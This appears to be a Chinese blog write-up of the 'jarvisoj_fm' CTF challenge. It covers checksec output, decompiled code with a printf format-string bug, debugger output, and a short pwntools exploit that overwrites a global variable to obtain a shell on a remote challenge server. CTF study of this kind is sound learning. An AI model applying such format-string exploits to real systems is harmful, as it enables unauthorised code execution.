加载头像

jarvisoj_fm

Ubuntu 16

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/jarvisoj_fm/fm'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled	//栈不可执行
    PIE:      No PIE (0x8048000)

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50u);		//read()函数存在栈溢出漏洞
  printf(buf);
  printf("%d!\n", x);		//x在.data段
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

//0x0804A02C

vmmap

pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x8048000 0x8049000 r-xp 1000 0 /home/zelas/Desktop/pwn/jarvisoj_fm/fm 0x8049000 0x804a000 r--p 1000 0 /home/zelas/Desktop/pwn/jarvisoj_fm/fm 0x804a000 0x804b000 rw-p 1000 1000 /home/zelas/Desktop/pwn/jarvisoj_fm/fm 0xf7db5000 0xf7dd2000 r--p 1d000 0 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7dd2000 0xf7f2a000 r-xp 158000 1d000 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7f2a000 0xf7f9d000 r--p 73000 175000 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7f9d000 0xf7f9e000 ---p 1000 1e8000 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7f9e000 0xf7fa0000 r--p 2000 1e8000 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7fa0000 0xf7fa2000 rw-p 2000 1ea000 /usr/lib/i386-linux-gnu/libc-2.33.so 0xf7fa2000 0xf7fa9000 rw-p 7000 0 [anon_f7fa2] 0xf7fc3000 0xf7fc5000 rw-p 2000 0 [anon_f7fc3] 0xf7fc5000 0xf7fc9000 r--p 4000 0 [vvar] 0xf7fc9000 0xf7fcb000 r-xp 2000 0 [vdso] 0xf7fcb000 0xf7fcc000 r--p 1000 0 /usr/lib/i386-linux-gnu/ld-2.33.so 0xf7fcc000 0xf7fee000 r-xp 22000 1000 /usr/lib/i386-linux-gnu/ld-2.33.so 0xf7fee000 0xf7ffb000 r--p d000 23000 /usr/lib/i386-linux-gnu/ld-2.33.so 0xf7ffb000 0xf7ffd000 r--p 2000 2f000 /usr/lib/i386-linux-gnu/ld-2.33.so 0xf7ffd000 0xf7ffe000 rw-p 1000 31000 /usr/lib/i386-linux-gnu/ld-2.33.so 0xfffdd000 0xffffe000 rw-p 21000 0 [stack]

0x02

思路 fmt string

1.gdb找到fmtarg的位置

pwndbg> fmtarg 0xffffce7c
The index of format argument : 12 ("\%11$p")

2.向x地址写入0x4

0x03

exp

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

context(log_level='debug')
# io = process(['./fm'])
io = remote('node4.buuoj.cn', 29085)

x = 0x0804A02C
payload = fmtstr_payload(11, {x: 0x4})
io.sendline(payload)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體